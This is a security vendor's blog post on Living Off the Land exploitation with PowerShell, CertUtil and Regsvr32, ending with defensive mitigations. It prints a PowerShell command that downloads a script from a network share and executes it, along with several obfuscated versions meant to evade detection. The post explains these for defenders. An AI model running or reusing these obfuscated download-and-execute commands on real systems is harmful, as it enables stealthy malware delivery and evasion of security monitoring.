Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
This is the fourth blog post in a series discussing Living Off the Land tools and techniques. Successful exploitation could allow an adversary to escalate privilege, obtain sensitive information or download additional software.
In this blog post we will focus on tools that can be exploited to download additional payloads.
Living Off the Land tools for exploitation are popular amongst both sophisticated and unsophisticated adversaries. Their use reduces the likelihood of detection and may increase the required investigation time.
In relation to Living Off the Land tools, the exploitation phase encapsulates a massive number of attack methods. For the sake of brevity, this blog post focuses on three tools in particular: PowerShell, CertUtil and Regsvr32.
Unless appropriate steps are taken to both prevent and detect these threats, adversaries will continue exploiting these and similar tools to perform a plethora of malicious activity.
Exploitation is admittedly a broad topic. Two of the most commonly exploited programs that are used to retrieve additional payloads are PowerShell and CertUtil.
PowerShell is a scripting language designed for task automation and configuration management; this tool is extremely flexible and was discussed at length in the first installment of this series, Living Off the Land – The Reconnaissance Phase 1. In the context of exploitation, PowerShell obfuscation is heavily utilized in order to bypass and circumvent detection methods. It increases the difficulty for incident responders to quickly identify the purpose of the specific command.
CertUtil is a Windows program used to download and update certificates 2. In the past, adversaries have exploited CertUtil to download additional payloads after enticing users to open weaponized documents.
In 2016, a post exploitation technique was released that exploited the use of regsvr32.exe to download and execute remote files. It was dubbed ‘Squiblydoo’ and was used to bypass App Locker and other application whitelisting software. Today Squiblydoo is blocked by default using Windows 10 Home Defender but is still allowed on some versions of Windows 7.
This is by no means an exhaustive list. A more comprehensive list of Living Off the Land Tools has been made available on GitHub through various security researchers 3.
PowerShell is able to interpret commands that have been obfuscated to evade detection by security products and incident responders. In the below example we demonstrate a variety of obfuscation techniques adversaries have often employed. In these examples the PowerShell command will download a file from the internet and execute it.
<span>powershell</span> <span>-c</span> <span>"mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"</span>
<span>.(</span><span>"{1}{0}{3}{2}"</span><span>-f</span> <span>'owers'</span><span>,</span><span>'p'</span><span>,</span><span>'l'</span><span>,</span><span>'hel'</span><span>)</span> <span>-c</span> <span>(((</span><span>"{33}{31}{34}{16}{29}{17}{32}{6}{11}{27}{35}{7}{26}{20}{39}{12}{0}{13}{8}{10}{25}{22}{3}{23}{2}{15}{36}{18}{24}{28}{37}{21}{5}{9}{14}{30}{1}{38}{19}{4}"</span> <span>-f</span> <span>'dFile'</span><span>,</span><span>'te'</span><span>,</span><span>'ZRQTe'</span><span>,</span><span>'Bbn,B'</span><span>,</span><span>'1'</span><span>,</span><span>'ower'</span><span>,</span><span>'s'</span><span>,</span><span>'ient'</span><span>,</span><span>'R'</span><span>,</span><span>'she'</span><span>,</span><span>'QZRQ19'</span><span>,</span><span>'tem.'</span><span>,</span><span>'oa'</span><span>,</span><span>'(BbnZ'</span><span>,</span><span>'ll -f C'</span><span>,</span><span>'mp'</span><span>,</span><span>':'</span><span>,</span><span>'mp; '</span><span>,</span><span>'es'</span><span>,</span><span>'s'</span><span>,</span><span>'.Do'</span><span>,</span><span>'s1Bbn); p'</span><span>,</span><span>'aringZRQtest2.ps1'</span><span>,</span><span>'bnC:'</span><span>,</span><span>'t'</span><span>,</span><span>'2.168.0.115ZRQSh'</span><span>,</span><span>')'</span><span>,</span><span>'Net.We'</span><span>,</span><span>'2'</span><span>,</span><span>'ZRQTe'</span><span>,</span><span>':ZRQTempZRQ'</span><span>,</span><span>'k'</span><span>,</span><span>'(new-object Sy'</span><span>,</span><span>'m'</span><span>,</span><span>'dir C'</span><span>,</span><span>'bCl'</span><span>,</span><span>'ZRQt'</span><span>,</span><span>'.p'</span><span>,</span><span>'st2.p'</span><span>,</span><span>'wnl'</span><span>)).</span><span>"Rep`laCE"</span><span>((</span><span>[CHAR]</span><span>90+</span><span>[CHAR]</span><span>82+</span><span>[CHAR]</span><span>81),</span><span>[StRiNg][CHAR]</span><span>92).</span><span>"r`ePL`ACe"</span><span>((</span><span>[CHAR]</span><span>66+</span><span>[CHAR]</span><span>98+</span><span>[CHAR]</span><span>110),</span><span>[StRiNg][CHAR]</span><span>39))</span>
<span>${]]]]]]]]]]]]}</span> <span>=+</span> <span>$()</span> <span>;</span><span>${]]]]]]}</span> <span>=</span> <span>${]]]]]]]]]]]]}</span><span>;</span><span>${]]]]}</span> <span>=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]}=++</span> <span>${]]]]]]]]]]]]}</span><span>;</span> <span>${]]]]]]]}=</span> <span>++${]]]]]]]]]]]]}</span> <span>;</span><span>${]]}=++${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]]]}=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]}</span> <span>=++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span><span>${]]]]]}</span> <span>=++${]]]]]]]]]]]]}</span> <span>;</span><span>${]]]]]]]]}</span> <span>=</span> <span>++</span> <span>${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]}</span> <span>=</span> <span>++${]]]]]]]]]]]]}</span> <span>;</span> <span>${]]]]]]]]]]}</span> <span>=</span><span>"["</span><span>+</span> <span>"$(@{ }) "</span><span>[</span> <span>${]]]]]}]+</span><span>"$(@{ })"</span><span>[</span> <span>"${]]]]}${]]]]]]]]]}"</span><span>]+</span><span>"$( @{} ) "</span><span>[</span> <span>"${]}${]]]]]]}"</span> <span>]</span> <span>+</span><span>"$? "</span><span>[</span> <span>${]]]]}]+</span> <span>"]"</span> <span>;</span><span>${]]]]]]]]]]]]}=</span><span>""</span><span>.(</span><span>"$(@{ })"</span><span>[</span> <span>"${]]]]}"</span><span>+</span><span>"${]]}"</span><span>]+</span> <span>"$( @{} )"</span><span>[</span> <span>"${]]]]}"</span> <span>+</span> <span>"${]]]}"</span><span>]</span> <span>+</span><span>"$( @{} ) "</span><span>[${]]]]]]}</span> <span>]</span> <span>+</span><span>"$( @{ } ) "</span><span>[${]]}</span> <span>]+</span><span>"$?"</span><span>[</span> <span>${]]]]}]</span> <span>+</span><span>"$(@{ })"</span><span>[${]]]]]]]}])</span> <span>;</span> <span>${]]]]]]]]]]]]}=</span><span>"$(@{ } ) "</span><span>[</span><span>"${]]]]}"</span><span>+</span> <span>"${]]}"</span><span>]</span> <span>+</span><span>"$(@{})"</span><span>[${]]}]+</span><span>"${]]]]]]]]]]]]}"</span><span>[</span> <span>"${]}"</span> <span>+</span> <span>"${]]]]]}"</span> <span>]</span> <span>;</span> <span>"${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]}+ ${]]]]]]]]]]}${]]}${]]]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]}${]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]} +${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]}${]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]} + ${]]]]]]]]]]}${]]]]]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]}+ ${]]]]]]]]]]}${]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]}${]} + ${]]]]]]]]]]}${]]]]]]]]}${]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]}${]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]}${]]]}+ ${]]]]]]]]]]}${]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]} + ${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]]]]]]]}${]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]}${]]]]}+ ${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]]}${]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]} + ${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]}${]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]} +${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]}+ ${]]]]]]]]]]}${]]}${]]]}+ ${]]]]]]]]]]}${]]}${]]]]]]]]}+${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]} +${]]]]]]]]]]}${]]]]]]]]]}${]}+ ${]]]]]]]]]]}${]]]]]]]]}${]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]}+${]]]]]]]]]]}${]]]]]]]]]}${]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]} + ${]]]]]]]]]]}${]]}${]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]}${]]}+ ${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]}${]]]]]}+ ${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]}+ ${]]]]]]]]]]}${]]]]]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]}+${]]]]]]]]]]}${]]}${]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]}${]]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]}+${]]]]]]]]]]}${]]]]}${]]]]]]}${]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]}+${]]]]]]]]]]}${]]]]]]]}${]} +${]]]]]]]]]]}${]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]}+${]]]]]]]]]]}${]]]]]]]}${]}+${]]]]]]]]]]}${]]]}${]]]]]}+${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]}${]]}+ ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} + ${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]]]]]]}+ ${]]]]]]]]]]}${]]]]}${]]]]}${]} +${]]]]]]]]]]}${]]]]]]]]]}${]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]} +${]]]]]]]]]]}${]]]]}${]]]]]]}${]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} +${]]]]]]]]]]}${]]]]}${]]]]}${]]]} +${]]]]]]]]]]}${]]]]]]]]]]]}${]]]]]]}+ ${]]]]]]]]]]}${]]}${]]]} + ${]]]]]]]]]]}${]]]]}${]]]]}${]}+${]]]]]]]]]]}${]]]]}${]]]]}${]]]]]]]]]]]} + ${]]]]]]]]]]}${]]}${]]]]]]]]]} + ${]]]]]]]]]]}${]]]]]]]}${]]} | ${]]]]]]]]]]]]} "</span><span>|&${]]]]]]]]]]]]}</span>
<span>sv</span> <span>(</span><span>'n'</span><span>+</span><span>'209t'</span><span>+</span><span>'e'</span><span>)</span> <span>(</span><span>[cHAr[]]</span><span>" ))93]RAHc[]GnirTs[,'JPW'(ECalPeR.)29]RAHc[]GnirTs[,'k2B'(ECalPeR.)43]RAHc[]GnirTs[,)37]RAHc[+56]RAHc[+57]RAHc[((ECalPeR.)'IA'+'K'+'1'+'sp.2tsetk2Bpm'+'eTk'+'2B:C '+'f- llehsr'+'ewop ;)JPW1s'+'p.2t'+'set'+'k'+'2Bpm'+'eTk2B:'+'C'+'JP'+'W,J'+'PW1sp.2'+'t'+'s'+'e'+'tk2Bgni'+'rah'+'S'+'k2B511'+'.0.86'+'1.291k2Bk2BJPW(eliF'+'daolnwoD.)t'+'neil'+'Cb'+'eW.t'+'eN.metsy'+'S tcej'+'bo-'+'wen( ;'+'pmeTk2B:C rid'+'kmIAK c- lle'+'h'+'sre'+'wop'( ()'X'+]03[EMOHsp$+]4[emoHSp$ ( ."</span><span>)</span><span>;</span> <span>[ARrAY]</span><span>::</span><span>ReveRSE(</span><span>$N209te</span><span>)</span> <span>;</span> <span>IEX(</span> <span>-Join</span><span>$N209te</span><span>)</span>
<span>INvoKE-EXprEssIon</span><span>(</span><span>nEW-oBjECt</span> <span>sYSTEM.iO.stREAMReAder((</span><span>nEW-oBjECt</span> <span>sYsteM.iO.CompREssioN.deFLAtesTReAm(</span><span>[sySTeM.iO.MeMOrYSTreAm] [SYSteM.convErT]</span><span>::</span><span>FromBaSe64sTRInG(</span> <span>'7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iVtVVXjfzvCzT7Wn60eLtrKjTk0e/75t8sTpMt5b51XY1+el82qavr5s2X4xf5O34u/nkpCzyZXtn/LS6WpZVNntWlPnWx7/v77v7cG+8++nBeGe8u3v/9309z+piefH7tnnT7o1Xze7Ho48VuPfZncPUR+Pc9O+afPT/AA=='</span><span>),</span> <span>[iO.cOMPRESsION.cOmPrEssIOnModE]</span><span>::</span><span>Decompress</span> <span>)</span> <span>),</span><span>[sYStEm.TeXT.ENcoDInG]</span><span>::</span><span>AScIi)).reaDTOEND(</span> <span>)</span>
The PowerShell script ‘Invoke-Obfuscation’ has been created to automate the obfuscation process 4. Invoke-Obfuscation allows the user to conceal a PowerShell command’s true purpose using a list of pre-defined obfuscation techniques.
The example below shows how difficult it is for an incident responder to determine what the PowerShell command is doing after Invoke-Obfuscation has been applied.
<span>powershell</span> <span>-c</span> <span>"mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"</span>
<span>neW-OBjEcT</span> <span>iO.ComPressIOn.dEFlaTEStREAM(</span> <span>[systEM.Io.mEmORystREam] [cOnVert]</span><span>::</span><span>FrOmBase64StRINg(</span><span>'7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0l+Ybm19/pPpx99aPK2/9fGd8Yvjxen37o12d0d739/+TnW2/PjjO+lWuvXx6uNPPq6u8rqZ0y85/b8s0236MU3pH2rwVX29oN/e0v9nBf1T0//Tk0e/N/34Cn9ep59Qk+989QavL+hX/Lk6RKst+meZX21Xk5/Op1+hZfqVQrim/7do8/q6afEVfqev62sGM+bW6IIbv8jxt35w3Zov01S+HtM/38V7kxPgDyzxAhBZtnfor7HATdHLJ/wvffD0Ywx8WdpePtEvKvqRYbj0/2cAVuZbl2Xze38HX//e3/lq9+GeeUH736V/Pz0AGjuCqPYhXwqZDMLXaHyf/v97uzFxg+989XpuKMrkoO8zgChsk08EJP1/eUGICNk+MWT4CgTNXW/0fdPujVfN7iUG2YwuS2mY2lca+ofm8it9QfDAb4qIJTP6lBleYea/81VrUdU5o67oB2iwkqlWalLv/Df947p3vd+xHMFdUavDlFnSDpVfveIJxdfEqDmxKH2xfc5d+JjS9yePdLKV2a6JUG8MVdBAR8CjNC0tHPqnzZVqPD93MKJXp/TPy+fZNN9iYhBI+ndk3/q9nhwIunfGr06l3db3pvNjvPr9XUz4gSKIT+kj+nXnQHjefUq/7e7epy5H32swlYB4trz4/vfo55T+r/Don3sP0zt3SKjr05dldoLOTr59XH//wf1P5JdPP9Vf7n96Z/Tx79tveWBa7u7um9/2dqnj12/qs+Xn35eP7j28c+f/AQ=='</span> <span>),</span> <span>[Io.cOmPRESSIon.cOMpReSsionMoDe]</span><span>::</span><span>DEComPReSs</span> <span>)|</span><span>FoREACh</span><span>{</span><span>neW-OBjEcT</span> <span>SystEm.IO.sTreAmrEadEr(</span> <span>$_</span><span>,</span><span>[Text.eNCoDing]</span><span>::</span><span>aSCii)</span> <span>}|</span> <span>fOREAch</span><span>{</span> <span>$_</span><span>.rEaDtOend()}</span> <span>)</span> <span>|&(</span> <span>$pSHOMe</span><span>[21]+</span><span>$PShomE</span><span>[34]+</span><span>'x'</span><span>)</span>
The above PowerShell command was obfuscated via command token obfuscation, using the “string” and “whitespace” options, concatenating the entire command and then compressing it. The result is a command that is unrecognizable to human eyes but can still be immediately executed by PowerShell.
CertUtil has been exploited by adversaries to circumvent security products in order to download payloads. As recently as March 2018, CertUtil has been used in the wild in targeted attacks; the technique has been added into the Sanny malware family to download encrypted BAT files 5.
In the example below you can see a base64 encoded file being downloaded from a webserver. Once it has been decoded it can be executed by another program.
Adversaries can still use Regsvr32.exe on some versions of Windows 7 to download and execute files.
The example below shows the ability to download and execute JavaScript embedded inside payload.scr.
There are both broad and specific steps to help defend against the tools discussed in this blog post. Ensuring that employees are aware of ongoing threats and giving them the training to deal with potentially hostile situations strengthens the last line of defence.
The risks associated with Regsvr32 can be minimized by adding firewall rules to deny connections initiated by the Regsvr32.exe process. Process monitoring can also be employed to quickly identify the unusual command-line arguments, modified files or network connection that an adversary may make using CertUtil and Regsvr32 6.
As discussed in previous blog posts enabling PowerShell logging can help identify encoded PowerShell commands and record unusual behavior performed by adversaries 7.
In conclusion, Living Off the Land tools are actively being used by adversaries to complete the exploitation stage of their attacks. This minimizes the chances of detection, lessening the time for incident responders to identify and remediate the issue. The ease and effectiveness of the Living Off the Land exploitation tools discussed in this blog makes it clear why adversaries are frequently employing these and similar tools. Using the mitigation strategies listed above will help companies to discover and quickly remediate a wide variety of attacks.
In the next and final blog post in this series, the focus is on the Living Off the Land tools used in stage six of the Cyber Kill Chain, Command and Control.
Sources
[1] https://www.esentire.com/blog/living-off-the-land-the-reconnaissance-phase/
[2] https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
[3] https://github.com/api0cradle/LOLBAS
[4] https://github.com/danielbohannon/Invoke-Obfuscation
[5] https://threatpost.com/sanny-malware-updates-delivery-method/130803/